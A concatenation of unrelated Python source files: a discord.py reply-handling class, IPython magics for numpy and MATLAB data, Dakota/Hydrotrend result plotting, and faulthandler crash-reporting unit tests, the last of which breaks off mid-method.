settings.source = ops.FusionPointSource()
my_model = openmc.Model(
materials=materials, geometry=geometry, settings=settings, tallies=tallies
)
statepoint_file = my_model.run()
|
from __future__ import annotations
import re
import inspect
import typing as t
from abc import ABC
import discord
from discord.ext import commands
import asyncio
import blurple.ui as ui
class Reply(ABC):
    """ An abstract class for getting replies, to be extended.

    If you are trying to get a reply from the user directly, you may be looking for :class:`MessageReply` or :class:`ReactionAddReply`.

    :Extending this class::

        In order to extend this class, there are 5 methods you can specialize.

        - :func:`on_reply_init` Use this method to initialize variables at the start.
        - :func:`on_pre_reply` Use this method to prepare anything before reply attempts.
        - :func:`reply_check` This is required. Evaluate whether an event call is considered a user reply attempt.
        - :func:`on_reply_attempt` Use this method to handle resetting the state after a reply attempt.
        - :func:`on_reply_complete` Use this method to handle final cleanup.

    :param ctx: The :class:`~commands.Context` variable
    :param validate: An optional parameter to validate the reply.

        - If left blank, no validation will be performed.
        - If you pass a :class:`list` / :class:`set`, validation will succeed when the reply content is found inside the list/set.
        - If you pass a :class:`str`, validation will succeed when the reply content matches the string as a regex.
        - If you pass a :class:`function` or :class:`coroutine`, the function will be called, and the coroutine awaited, validation will succeed when the function returns a Truthy value. The reply object will be passed as a parameter.
    :param error: An optional parameter specifying the message to send when the user fails validation, defaults to a simple "Invalid Reply" :class:`~Alert`.
    """

    def __init__(self,
            ctx: commands.Context,
            *,
            validate: t.Optional[t.Union[str, t.Callable, t.List]] = None,
            # NOTE: this default Alert is built once at class-definition time
            # and shared by all instances; it is only ever read, never mutated.
            on_error: t.Union[str, discord.Embed] = ui.Alert(ui.Style.DANGER, title="Invalid Reply"),
            timeout = 180,
            **kwargs) -> None:
        self.ctx = ctx
        self.validate = validate
        self.on_error = on_error
        # Handle to the currently displayed error message, if any.
        self.error = None
        self.timeout = timeout
        # Extra kwargs are forwarded to on_reply_init().
        self.kwargs = kwargs

    def __str__(self):
        return self.__class__.__name__

    def __repr__(self):
        # NOTE(review): ``self.event`` is expected to be supplied by
        # subclasses (the event name this listener waits for) — confirm.
        return f"<{self.__class__.__name__} for '{self.event}'>"

    async def result(self):
        """Await the result of the reply."""
        await self.on_reply_init(**self.kwargs) # Event method
        reply = await self._get_valid_reply()
        await self._cleanup()
        return reply

    async def _cleanup(self):
        """Clean up reply after result."""
        await self.on_reply_complete() # Event method
        await self._delete_error()

    async def _get_valid_reply(self):
        """Wrap get_reply with validation, error handling, and recursive calls."""
        reply = await self._get_reply()

        if reply is not None: # Reply hasn't timed out
            # Validate reply
            is_valid = await self._validate_reply(reply, self.validate)

            # If reply isn't valid, recursively call function
            if not is_valid:
                await self._send_error()
                return await self._get_valid_reply()

        return reply

    async def _get_reply(self):
        """Get a reply from the user, no validation.

        Returns the (possibly parsed) reply, or None on timeout.
        """
        await self.on_pre_reply() # Event method

        # Wait for reply
        try:
            raw_reply = await self.ctx.bot.wait_for(
                self.event,
                check=self.reply_check,
                timeout=self.timeout
            )
        except asyncio.TimeoutError:
            reply = None
        else:
            # on_reply_attempt may return a parsed form of the raw reply.
            r = await self.on_reply_attempt(raw_reply) # Event method
            reply = r if r else raw_reply

        return reply

    async def _send_error(self) -> discord.Message:
        """ Send an error message to the user.

        Will replace the current error message.
        """
        await self._delete_error()
        if isinstance(self.on_error, discord.Embed):
            self.error = await self.ctx.send(embed=self.on_error)
        elif isinstance(self.on_error, str):
            self.error = await self.ctx.send(self.on_error)
        return self.error

    async def _delete_error(self) -> None:
        """Delete the current error message, if it exists."""
        if self.error is None:
            return
        await self.error.delete()
        self.error = None

    @classmethod
    async def _validate_reply(cls, reply, valid: t.Union[str, t.Container, t.Callable]) -> bool:
        """Detect validation type and check it against the reply."""
        if valid is None:
            return True

        content = cls._get_reply_content(reply)

        if isinstance(valid, str):
            return bool(re.search(valid, content))
        if cls._iscontainer(valid):
            return content in valid
        if callable(valid):
            # BUGFIX: previously tested `inspect.iscoroutinefunction(object)`
            # (the builtin), which is always False, so coroutine validators
            # were returned un-awaited and always treated as truthy.
            if inspect.iscoroutinefunction(valid):
                return await valid(reply)
            return valid(reply)
        # Unsupported validator types fall through (implicitly None/falsy).

    @staticmethod
    def _get_reply_content(reply):
        """ Retrieve the content of the reply."""
        if isinstance(reply, discord.Message):
            return reply.content
        if isinstance(reply, (discord.Reaction, discord.RawReactionActionEvent)):
            return str(reply.emoji)

    @staticmethod
    def _iscontainer(obj: t.Union[t.Container, t.Any]):
        return getattr(obj, "__contains__", False)

    @classmethod
    async def result_between(cls, replies: t.Container[Reply]) -> t.Tuple[Reply, t.Any]:
        """ Return the first completed result between multiple reply objects.

        .. warning:: The ``replies`` collection is mutated (the winning reply
            is removed so the rest can be cleaned up).

        :param replies: A collection of Reply objects.
        :returns: A tuple containing the Reply object and the result it returned.

        :How to use this:
            This can be an especially powerful function if used correctly.

            Here's an example of an rsvp list interaction with reactions using this function.
            This is completely contrived for example and not a practical use.

            .. code-block:: python

                rsvp_react = "..." # Replace this with whatever you want
                rsvp_list = []

                # Start the reply wait
                message = await ctx.send("React to RSVP!")
                await message.add_reaction(rsvp_react)
                add = io.ReactionAddBasic(message, validate=[rsvp_react])
                remove = io.ReactionRemoveBasic(message, validate=[rsvp_react])
                while True:
                    obj, result = await io.Reply.result_between({add, remove})
                    if obj is add:
                        rsvp_list.append(result.user_id)
                    elif obj is remove:
                        rsvp_list.remove(result.user_id)
                    else: # obj is None (The reply timed out)
                        break

                # Reply wait complete
                await message.clear_reactions()
                await message.edit(f"Here's the list of RSVPrs:\\n{'\\n'.join([f'> <@{user_id}>' for user_id in rsvp_list])}")
        """
        # Prepare tasks
        timeouts = []
        def parse_task(reply: Reply):
            # Handle timeout: the shared wait below enforces the smallest
            # timeout, so disable each reply's own.
            timeouts.append(reply.timeout)
            reply.timeout = None
            # Return task (task name is str(reply), used to match it back)
            return asyncio.create_task(reply.result(), name=reply)

        # Wait tasks
        tasks = [parse_task(task) for task in replies]
        task, result = await cls._wait_tasks(tasks, timeout=min(timeouts))

        # Get original reply object
        for obj in replies:
            if task is None:
                obj = None
                break
            if str(obj) == task.get_name():
                break

        # Run cleanup on cancelled replies
        replies.remove(obj)
        for cancelled in replies:
            await cancelled._cleanup()

        # Return original reply object and the result
        return obj, result

    @staticmethod
    async def _wait_tasks(tasks: t.Container[asyncio.Task], timeout: int) -> t.Tuple[t.Optional[asyncio.Future], t.Optional[t.Any]]:
        """ Try block to asyncio.wait a set of tasks with timeout handling.

        :param tasks: A collection of task objects
        :param timeout: How long in seconds to wait until a timeout occurs.
        :return: A tuple containing the task and the result. Both will be None if a timeout occurs.
        """
        done, pending = await asyncio.wait(tasks, timeout=timeout, return_when=asyncio.FIRST_COMPLETED)
        for rest in pending:
            rest.cancel()
        if done:
            task: asyncio.Future = done.pop()
            return task, task.result()
        return None, None

    async def on_reply_init(self):
        """ An abstract method, to be extended in custom Reply listeners.

        This method runs when the Reply class is created.
        """

    async def on_pre_reply(self):
        """ An abstract method, to be extended in custom Reply listeners.

        This method runs before each reply attempt, can run multiple times with validation.
        """

    def reply_check(self, reply):
        """ An abstract method, to be extended in custom Reply listeners.

        This method runs as a check to determine whether to recognize the reply event, can run multiple times with validation.
        """

    async def on_reply_attempt(self, reply):
        """ An abstract method, to be extended in custom Reply listeners.

        This method runs after each reply attempt, can run multiple times with validation.

        :return: You can optionally return a parsed version of the reply to be used instead of the raw reply object.
        """

    async def on_reply_complete(self):
        """ An abstract method, to be extended in custom Reply listeners.

        This method runs after a valid reply is returned.
        """
|
"""
Magic commands.
"""
from __future__ import print_function
from IPython.core.magic import Magics, magics_class, line_magic
@magics_class
class MyMagics(Magics):
    """Line magics for moving numpy/MATLAB data in and out of the user namespace.

    NOTE(review): relies on ``get_ipython()`` being available in the
    interactive namespace (IPython injects it); this module is meant to be
    executed inside a running IPython session.
    """

    @line_magic
    def loadnpz(self, params=''):
        """Load a npz file into user namespace.

        %loadnpz <filename.npz>
        """
        import numpy as np
        ip = get_ipython()
        args = params.split()
        if len(args) == 0:
            return
        # Exactly one filename expected; extra arguments raise ValueError.
        filename, = args
        ip.push(dict(np.load(filename)), interactive=True)

    @line_magic
    def loadmat(self, params=''):
        """Load a MATLAB file into user namespace.

        %loadmat [-s] <filename.mat>

        The -s option squeezes unit matrix dimensions.
        """
        from scipy.io import loadmat
        ip = get_ipython()
        args = params.split()
        squeeze_me = False
        if len(args) > 0 and args[0] == '-s':
            squeeze_me = True
            args = args[1:]
        if len(args) == 0:
            print("no filename specified")
            return
        ip.push(loadmat(args[0], squeeze_me=squeeze_me), interactive=True)

    @line_magic
    def savemat(self, params=''):
        """Save interactive variables to a MATLAB file.

        %savemat [-c] <filename.mat>
        - Saves all interactive variables.

        %savemat [-c] <filename.mat> <var1 var2 ...>
        - Saves selected variables var1, var2, etc. only.

        The -c option turns on compression of the resulting MATLAB file.
        """
        import scipy.io as sio
        ip = get_ipython()
        args = params.split()
        do_compression = False
        if len(args) > 0 and args[0] == '-c':
            do_compression = True
            args = args[1:]
        if len(args) == 0:
            print("no filename specified")
            return
        # Renamed from `vars` to avoid shadowing the builtin.
        filename, var_names = args[0], args[1:]
        # With no explicit names, save every interactive variable
        # (the two previous duplicate branches are merged here).
        if len(var_names) == 0:
            var_names = ip.magic('%who_ls')
        sel = dict((k, ip.user_ns[k]) for k in var_names)
        print("Saving variables:", list(sel.keys()))
        sio.savemat(filename, sel, do_compression=do_compression)

    @line_magic
    def imshow(self, params=''):
        """Shows given image in matplotlib.

        %imshow [options] name ...

        -t <title>   Set title of all figures. The default title
                     is the name of the image.
        -c <cmap>    Set colormap of all figures (e.g. gray).
        """
        # BUGFIX: np was used below but never imported, raising NameError on
        # every call; a local import matches loadnpz's convention.
        import numpy as np
        import matplotlib.pyplot as plt
        from matplotlib import cm
        opts, args = self.parse_options(params, 'c:t:')
        names = args.split()
        cmap = cm.get_cmap()
        if 'c' in opts:
            # parse_options returns a Struct, so attribute access works here.
            cmap = cm.get_cmap(name=opts.c)
            if cmap is None:
                print("invalid colormap:", opts.c)
                return
        titles = names
        if 't' in opts:
            titles = len(names)*[opts.t]
        ip = get_ipython()
        for name, tl in zip(names, titles):
            img = np.squeeze(ip.user_ns[name])
            if img.ndim != 2:
                print("%s is not 2-D; skipping" % (name,))
                continue
            plt.figure()
            plt.imshow(img, cmap=cmap)
            plt.colorbar()
            plt.title(tl)
if __name__ == '__main__':
    # Register the magics with the running IPython shell, then drop the
    # helper name so it does not linger in the interactive namespace.
    get_ipython().register_magics(MyMagics)
    del MyMagics
|
# <gh_stars>1-10
"""Make plots of the results of Dakotathon experiments."""
import os
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Parameter ranges used for gridding and as axis limits (units taken from
# the axis labels below):
TRANGE = [10., 20.]    # temperature T [degC]
PRANGE = [ 1., 2.]     # precipitation P [m/yr]
CSRANGE = [10., 45.0]  # sediment concentration Cs [kg/m^3]

plt.rcParams['mathtext.default'] = 'regular'
cmap = plt.cm.PuOr_r
def read_dat_header(dat_file):
    """Return the whitespace-split column names from the first line of
    *dat_file*, or None if the file cannot be read (best effort)."""
    try:
        with open(dat_file, 'r') as fp:
            return fp.readline().split()
    except IOError:
        return None
def read_dat_file(dat_file):
    """Load a Dakota tabular .dat file as a (columns x rows) float array,
    skipping the non-numeric 'interface' column.

    :param dat_file: path to the tabular data file (header on line 1).
    :return: numpy array with one row per retained column (unpack=True).
    """
    names = read_dat_header(dat_file)
    # range() objects have no pop() on Python 3 -- materialize the index
    # list before removing the 'interface' column.
    usecols = list(range(len(names)))
    usecols.pop(names.index('interface'))
    return np.loadtxt(dat_file, skiprows=1, unpack=True, usecols=usecols)
def grid_samples(x, y, z):
    """Linearly interpolate scattered (x, y, z) samples onto a regular
    20x20 grid spanning TRANGE x PRANGE; returns (grid_x, grid_y, grid_z)."""
    points = np.transpose(np.array([x, y]))
    grid_x, grid_y = np.mgrid[TRANGE[0]:TRANGE[1]:complex(20),
                              PRANGE[0]:PRANGE[1]:complex(20)]
    grid_z = griddata(points, z, (grid_x, grid_y), method='linear')
    return (grid_x, grid_y, grid_z)
def make_stacked_surface_plot(x, y, z, outfile='surface.png'):
    """Plot the gridded response surface z(x, y) in 3D above the raw
    sample points and save it as a PNG.

    :param x: sample T values.
    :param y: sample P values.
    :param z: response values (max Cs).
    :param outfile: name of the PNG file written.
    """
    X, Y, Z = grid_samples(x, y, z)
    fig = plt.figure()
    # NOTE(review): fig.gca(projection='3d') was removed in matplotlib 3.6;
    # switch to fig.add_subplot(projection='3d') when upgrading.
    ax = fig.gca(projection='3d')
    ax.scatter(x, y, zs=CSRANGE[0], s=10, zdir='z', c='r')
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0.5, color=cmap(0.2))
    # Fixed stray '}' in the original title ('max($C_s}$)') that broke the
    # mathtext expression.
    plt.title('Hydrotrend: T-P samples and max($C_s$) response')
    ax.set_xlim(TRANGE)
    ax.set_ylim(PRANGE)
    ax.set_zlim(CSRANGE)
    plt.locator_params(axis='x', nbins=5)
    plt.locator_params(axis='y', nbins=5)
    ax.set_autoscale_on(False)
    # Raw strings throughout: '\ ' is an invalid string escape otherwise.
    ax.set_xlabel(r'$T\ [^{o}C]$')
    ax.set_ylabel(r'$P\ [m\ yr^{-1}]$')
    ax.set_zlabel(r'$C_s\ [kg\ m^{-3}]$')
    ax.tick_params(axis='both', labelsize=10)
    plt.savefig(outfile, dpi=150)
    plt.close()
def make_contour_plot(x, y, z, outfile='contour.png'):
    """Plot filled contours of the gridded response z(x, y) with the raw
    sample points overlaid, and save it as a PNG.

    :param x: sample T values.
    :param y: sample P values.
    :param z: response values (max Cs).
    :param outfile: name of the PNG file written.
    """
    X, Y, Z = grid_samples(x, y, z)
    fig = plt.figure()
    ax = fig.add_subplot(111)
    nlevels = 8
    clevels = np.linspace(CSRANGE[0], CSRANGE[1], nlevels)
    c = ax.contourf(X, Y, Z, 10, cmap=cmap, vmin=0.1, antialiased=True, levels=clevels)
    ax.scatter(x, y, s=10, c=cmap(0.9))
    # Fixed stray '}' in the original title ('max($C_s}$)') that broke the
    # mathtext expression.
    plt.title('Hydrotrend: T-P samples and max($C_s$) response')
    ax.set_xlim(TRANGE)
    ax.set_ylim(PRANGE)
    plt.locator_params(axis='x', nbins=5)
    plt.locator_params(axis='y', nbins=5)
    # Raw strings: '\ ' is an invalid string escape otherwise.
    ax.set_xlabel(r'$T\ [^{o}C]$')
    ax.set_ylabel(r'$P\ [m\ yr^{-1}]$')
    cbar = plt.colorbar(c, shrink=0.75, aspect=25, extend='both')
    cbar.ax.set_ylabel(r'$max(C_s)\ [kg\ m^{-3}]$')
    plt.savefig(outfile, dpi=150)
    plt.close()
def make_pdf_and_cdf_plot(z, outfile='histogram.png'):
    """Plot the normalized histogram (pdf) of *z* with its cdf overlaid,
    plus markers for mean +/- stdev, a confidence interval, and a
    threshold annotation; save it as a PNG.

    :param z: response values (max Cs).
    :param outfile: name of the PNG file written.
    """
    fig, ax1 = plt.subplots()
    nbins = 21
    bins = np.linspace(0, 50, nbins)
    # NOTE(review): 'normed' was removed in matplotlib >= 3.1; replace with
    # density=True when upgrading.
    pdf, _, _ = ax1.hist(z, bins=bins, normed=True, color=cmap(0.4))
    # Fixed stray '}' in the original title ('max($C_s}$)') that broke the
    # mathtext expression.
    plt.title('Hydrotrend: max($C_s$) response distribution')
    ax1.set_ylim(0.0, 0.1)
    # Unit fixed from 'kg m^{-1}' to 'kg m^{-3}' for consistency with the
    # Cs labels in the other plots.
    ax1.set_xlabel(r'$max(C_s)\ [kg\ m^{-3}]$')
    ax1.set_ylabel('pdf')
    cdf = np.cumsum(pdf)
    cdf /= cdf.max()
    ax2 = ax1.twinx()
    ax2.plot(bins[:-1], cdf, color='b')
    ax2.set_ylabel('cdf')
    # Summary statistics for max(Cs); presumably computed offline from the
    # same experiment -- verify against the Dakota output.
    cs_mean = 20.31
    cs_stdv = 6.74
    cs_ci_lower = 18.97
    cs_ci_upper = 21.65
    top = ax2.get_ylim()[-1]
    ymrk = 0.95*top
    # Mean +/- one standard deviation: long ticks joined by a line, with a
    # square marker at the mean.
    ax2.plot(cs_mean-cs_stdv, ymrk, '|', color=cmap(0.3), ms=15, mew=1)
    ax2.plot(cs_mean+cs_stdv, ymrk, '|', color=cmap(0.3), ms=15, mew=1)
    ax2.plot([cs_mean-cs_stdv, cs_mean+cs_stdv], [ymrk, ymrk], color=cmap(0.3), lw=0.75)
    ax2.plot(cs_mean, ymrk, 's', color=cmap(0.3))
    # Confidence-interval bounds: short ticks.
    ax2.plot(cs_ci_lower, ymrk, '|', color=cmap(0.3), ms=10, mew=1)
    ax2.plot(cs_ci_upper, ymrk, '|', color=cmap(0.3), ms=10, mew=1)
    # Threshold annotation: vertical line at cs_thresh up to its cdf value,
    # then a horizontal guide line labelled with that value.
    cs_thresh = 40.0
    cs_thresh_value = 0.98
    right = ax2.get_xlim()[-1]
    ax2.plot([cs_thresh, cs_thresh], [0, cs_thresh_value], color=cmap(0.9), lw=0.5)
    ax2.plot([cs_thresh, right], [cs_thresh_value, cs_thresh_value], color=cmap(0.9), lw=0.5)
    ax2.text(0.95*right, 0.925*top, '0.98', ha='center', size=15)
    plt.savefig(outfile, dpi=150)
    plt.close()
if __name__ == '__main__':
    # Read the Dakota tabular output from the current working directory.
    experiment_dir = os.getcwd()
    dat_file = os.path.join(experiment_dir, 'dakota.dat')
    dat = read_dat_file(dat_file)
    # Rows 1-3 of the unpacked array are taken as T, P and max(Cs);
    # presumably row 0 is the evaluation id -- verify against the
    # dakota.dat header.
    T = dat[1,]
    P = dat[2,]
    C_s = dat[3,]
    make_stacked_surface_plot(T, P, C_s)
    make_contour_plot(T, P, C_s)
    make_pdf_and_cdf_plot(C_s)
|
from __future__ import with_statement
from contextlib import contextmanager
import datetime
import faulthandler
import os
import re
import signal
import subprocess
import sys
import tempfile
import unittest
from textwrap import dedent
try:
import threading
HAVE_THREADS = True
except ImportError:
HAVE_THREADS = False
# Timeout in seconds used by the dump_traceback_later() tests.
TIMEOUT = 1
MS_WINDOWS = (os.name == 'nt')
# True only on debug builds of CPython (sys.gettotalrefcount exists there).
Py_REF_DEBUG = hasattr(sys, 'gettotalrefcount')
# Use the stdlib SuppressCrashReport when available (test.support, Python 3);
# otherwise fall back to a local reimplementation.
try:
    from test.support import SuppressCrashReport
except ImportError:
    try:
        import resource
    except ImportError:
        # No resource module (e.g. Windows): core-limit handling is skipped.
        resource = None

    class SuppressCrashReport:
        """Try to prevent a crash report from popping up.

        On Windows, don't display the Windows Error Reporting dialog.  On UNIX,
        disable the creation of coredump file.
        """
        # Saved state restored by __exit__: the previous Windows error mode,
        # or the previous RLIMIT_CORE pair on UNIX.  None means "nothing to
        # restore".
        old_value = None

        def __enter__(self):
            """On Windows, disable Windows Error Reporting dialogs using
            SetErrorMode.

            On UNIX, try to save the previous core file size limit, then set
            soft limit to 0.
            """
            if sys.platform.startswith('win'):
                # see http://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx
                # GetErrorMode is not available on Windows XP and Windows Server 2003,
                # but SetErrorMode returns the previous value, so we can use that
                import ctypes
                self._k32 = ctypes.windll.kernel32
                SEM_NOGPFAULTERRORBOX = 0x02
                self.old_value = self._k32.SetErrorMode(SEM_NOGPFAULTERRORBOX)
                self._k32.SetErrorMode(self.old_value | SEM_NOGPFAULTERRORBOX)
            else:
                if resource is not None:
                    try:
                        # Keep the hard limit; only drop the soft limit to 0.
                        self.old_value = resource.getrlimit(resource.RLIMIT_CORE)
                        resource.setrlimit(resource.RLIMIT_CORE,
                                           (0, self.old_value[1]))
                    except (ValueError, OSError):
                        pass
                if sys.platform == 'darwin':
                    # Check if the 'Crash Reporter' on OSX was configured
                    # in 'Developer' mode and warn that it will get triggered
                    # when it is.
                    #
                    # This assumes that this context manager is used in tests
                    # that might trigger the next manager.
                    value = subprocess.Popen(['/usr/bin/defaults', 'read',
                                              'com.apple.CrashReporter', 'DialogType'],
                                             stdout=subprocess.PIPE).communicate()[0]
                    if value.strip() == b'developer':
                        sys.stdout.write("this test triggers the Crash "
                                         "Reporter, that is intentional")
                        sys.stdout.flush()
            return self

        def __exit__(self, *ignore_exc):
            """Restore Windows ErrorMode or core file behavior to initial value."""
            if self.old_value is None:
                return
            if sys.platform.startswith('win'):
                self._k32.SetErrorMode(self.old_value)
            else:
                if resource is not None:
                    try:
                        resource.setrlimit(resource.RLIMIT_CORE, self.old_value)
                    except (ValueError, OSError):
                        pass
# Use unittest.skipIf when it exists (Python >= 2.7/3.1); otherwise emulate
# it with a decorator that prints a skip message instead of running the test.
try:
    skipIf = unittest.skipIf
except AttributeError:
    import functools

    def skipIf(test, reason):
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kw):
                if test:
                    # Condition holds: report the skip, return None.
                    print("skip %s: %s" % (func.__name__, reason))
                else:
                    return func(*args, **kw)
            return wrapper
        return decorator
# Helper passed to child processes to disable core dumps; None when the
# resource module is unavailable (e.g. on Windows).
try:
    from resource import setrlimit, RLIMIT_CORE, error as resource_error
except ImportError:
    prepare_subprocess = None
else:
    def prepare_subprocess():
        # don't create core file
        try:
            setrlimit(RLIMIT_CORE, (0, 0))
        except (ValueError, resource_error):
            # Best effort: lowering the limit may be forbidden.
            pass
def spawn_python(*args, **kwargs):
    """Start the current interpreter with *args*.

    stdin and stdout are pipes; stderr is merged into stdout.  Extra
    keyword arguments are forwarded to subprocess.Popen.
    """
    cmd = (sys.executable,) + args
    return subprocess.Popen(
        cmd,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        **kwargs)
def expected_traceback(lineno1, lineno2, header, min_count=1):
    """Build a regex matching a faulthandler traceback: *header* followed
    by a func() frame at *lineno1* and a <module> frame at *lineno2*,
    repeated at least *min_count* times."""
    body = (header
            + '  File "<string>", line %s in func\n' % lineno1
            + '  File "<string>", line %s in <module>' % lineno2)
    if min_count > 1:
        return '^' + (body + '\n') * (min_count - 1) + body
    return '^' + body + '$'
@contextmanager
def temporary_filename():
    """Yield a fresh temporary file name and unlink it on exit.

    NOTE(review): tempfile.mktemp() is race-prone; it is kept here because
    the tests only need a *name* for a child process to create -- confirm
    before reusing elsewhere.
    """
    filename = tempfile.mktemp()
    try:
        yield filename
    finally:
        # The child may never have created the file; ignore a failed unlink.
        try:
            os.unlink(filename)
        except OSError:
            pass
class FaultHandlerTests(unittest.TestCase):
    """Functional tests for the faulthandler module.

    Most checks spawn a child interpreter that deliberately crashes or
    dumps a traceback, then match the child's output against a regex.
    The hard-coded line numbers below refer to lines *inside* the embedded
    code templates, so the templates' blank lines are significant.
    """

    def get_output(self, code, filename=None, **kwargs):
        """
        Run the specified code in Python (in a new child process) and read the
        output from the standard error or from a file (if filename is set).
        Return the output lines as a list.

        Strip the reference count from the standard error for Python debug
        build, and replace "Current thread 0x00007f8d8fbd9700" by "Current
        thread XXX".
        """
        code = dedent(code).strip()
        with SuppressCrashReport():
            process = spawn_python('-c', code, **kwargs)
            stdout, stderr = process.communicate()
            exitcode = process.wait()
        output = re.sub(br"\[\d+ refs\]\r?\n?", b"", stdout).strip()
        output = output.decode('ascii', 'backslashreplace')
        if filename:
            # Everything interesting went to the file, not to stderr.
            self.assertEqual(output, '')
            with open(filename, "rb") as fp:
                output = fp.read()
            output = output.decode('ascii', 'backslashreplace')
        output = re.sub('Current thread 0x[0-9a-f]+',
                        'Current thread XXX',
                        output)
        return output.splitlines(), exitcode

    def check_error(self, code, line_number, fatal_error,
                    filename=None, all_threads=True, other_regex=None,
                    thread_name=r"python([23](\.\d)?)?", **kwargs):
        """
        Check that the fault handler for fatal errors is enabled and check the
        traceback from the child process output.

        Raise an error if the output doesn't match the expected format.
        """
        if all_threads:
            if sys.version_info[:2] == (2, 6):
                # Python 2.6 cannot report the thread name.
                thread_name = 'python'
            if sys.platform.startswith('linux') and thread_name is not None:
                header = r'Current thread XXX <{0}> \(most recent call first\)'.format(thread_name)
            else:
                header = r'Current thread XXX \(most recent call first\)'
        else:
            # Raw string: '\(' is an invalid string escape otherwise.
            header = r'Stack \(most recent call first\)'
        regex = """
            ^{fatal_error}

            {header}:
              File "<string>", line {lineno} in <module>
            """
        regex = dedent(regex).format(
            lineno=line_number,
            fatal_error=fatal_error,
            header=header).strip()
        if other_regex:
            regex += '|' + other_regex
        output, exitcode = self.get_output(code, filename, **kwargs)
        output = '\n'.join(output)
        self.assertRegex(output, regex)
        self.assertNotEqual(exitcode, 0)

    def check_fatal_error(self, code, line_number, name_regex, **kw):
        # Fatal errors are reported as "Fatal Python error: <name>".
        fatal_error = 'Fatal Python error: %s' % name_regex
        self.check_error(code, line_number, fatal_error, **kw)

    def check_windows_exception(self, code, line_number, name_regex, **kw):
        # Windows crashes are reported as "Windows (fatal )?exception: ...".
        fatal_error = 'Windows (fatal )?exception: %s' % name_regex
        self.check_error(code, line_number, fatal_error, **kw)

    @skipIf(sys.platform.startswith('aix'),
            "the first page of memory is a mapped read-only on AIX")
    def test_read_null(self):
        if not MS_WINDOWS:
            self.check_fatal_error("""
                import faulthandler
                faulthandler.enable()
                faulthandler._read_null()
                """,
                3,
                # Issue #12700: Read NULL raises SIGILL on Mac OS X Lion
                '(?:Segmentation fault'
                '|Bus error'
                '|Illegal instruction)')
        else:
            self.check_windows_exception("""
                import faulthandler
                faulthandler.enable()
                faulthandler._read_null()
                """,
                3,
                'access violation')

    def test_sigsegv(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            faulthandler._sigsegv()
            """,
            3,
            'Segmentation fault')

    def test_sigabrt(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            faulthandler._sigabrt()
            """,
            3,
            'Aborted')

    @skipIf(sys.platform == 'win32',
            "SIGFPE cannot be caught on Windows")
    def test_sigfpe(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            faulthandler._sigfpe()
            """,
            3,
            'Floating point exception')

    @skipIf(not hasattr(signal, 'SIGBUS'), 'need signal.SIGBUS')
    def test_sigbus(self):
        self.check_fatal_error("""
            import faulthandler
            import signal

            faulthandler.enable()
            faulthandler._raise_signal(signal.SIGBUS)
            """,
            5,
            'Bus error')

    @skipIf(not hasattr(signal, 'SIGILL'), 'need signal.SIGILL')
    def test_sigill(self):
        self.check_fatal_error("""
            import faulthandler
            import signal

            faulthandler.enable()
            faulthandler._raise_signal(signal.SIGILL)
            """,
            5,
            'Illegal instruction')

    def test_fatal_error(self):
        if sys.version_info >= (2, 6):
            arg = "b'xyz'"
        else:
            arg = "'xyz'"
        message = "xyz\n"
        if sys.platform.startswith('win'):
            # When running unit tests with Microsoft Windows SDK,
            # Py_FatalError() displays the message "This application has
            # requested the Runtime to terminate it in an unusual way. Please
            # contact the application's support team for more information.".
            # Just ignore this message, it is not related to faulthandler.
            message += r"(.|\n)*"
        message += "Fatal Python error: Aborted"
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            faulthandler._fatal_error(%s)
            """ % arg,
            3,
            message)

    @skipIf(sys.platform.startswith('openbsd') and HAVE_THREADS,
            "Issue #12868: sigaltstack() doesn't work on "
            "OpenBSD if Python is compiled with pthread")
    @skipIf(not hasattr(faulthandler, '_stack_overflow'),
            'need faulthandler._stack_overflow()')
    def test_stack_overflow(self):
        if not MS_WINDOWS:
            self.check_fatal_error("""
                import faulthandler
                faulthandler.enable()
                faulthandler._stack_overflow()
                """,
                3,
                '(?:Segmentation fault|Bus error)',
                other_regex='unable to raise a stack overflow')
        else:
            self.check_windows_exception("""
                import faulthandler
                faulthandler.enable()
                faulthandler._stack_overflow()
                """,
                3,
                'stack overflow')

    def test_gil_released(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable()
            faulthandler._sigsegv(True)
            """,
            3,
            'Segmentation fault')

    def test_enable_file(self):
        with temporary_filename() as filename:
            # '{filename}' restored: the placeholder had been corrupted to
            # '(unknown)', so .format() never substituted the file name.
            self.check_fatal_error("""
                import faulthandler
                output = open({filename}, 'wb')
                faulthandler.enable(output)
                faulthandler._sigsegv()
                """.format(filename=repr(filename)),
                4,
                'Segmentation fault',
                filename=filename)

    def test_enable_single_thread(self):
        self.check_fatal_error("""
            import faulthandler
            faulthandler.enable(all_threads=False)
            faulthandler._sigsegv()
            """,
            3,
            'Segmentation fault',
            all_threads=False)

    def test_enable_env_var(self):
        # A non-empty PYTHONFAULTHANDLER enables the module at startup...
        output, exitcode = self.get_output("""
            import faulthandler
            print(faulthandler.is_enabled())
            """,
            env=dict(os.environ, PYTHONFAULTHANDLER='x'))
        self.assertEqual(output, ["True"])
        self.assertEqual(exitcode, 0)

        # ...while an empty value leaves it disabled.
        output, exitcode = self.get_output("""
            import faulthandler
            print(faulthandler.is_enabled())
            """,
            env=dict(os.environ, PYTHONFAULTHANDLER=''))
        self.assertEqual(output, ["False"])
        self.assertEqual(exitcode, 0)

    def test_disable(self):
        code = """
            import faulthandler
            faulthandler.enable()
            faulthandler.disable()
            faulthandler._sigsegv()
            """
        not_expected = 'Fatal Python error'
        stderr, exitcode = self.get_output(code)
        stderr = '\n'.join(stderr)
        self.assertTrue(not_expected not in stderr,
                        "%r is present in %r" % (not_expected, stderr))
        self.assertNotEqual(exitcode, 0)

    def test_is_enabled(self):
        orig_stderr = sys.stderr
        try:
            # regrtest may replace sys.stderr by io.StringIO object, but
            # faulthandler.enable() requires that sys.stderr has a fileno()
            # method
            sys.stderr = sys.__stderr__

            was_enabled = faulthandler.is_enabled()
            try:
                faulthandler.enable()
                self.assertTrue(faulthandler.is_enabled())
                faulthandler.disable()
                self.assertFalse(faulthandler.is_enabled())
            finally:
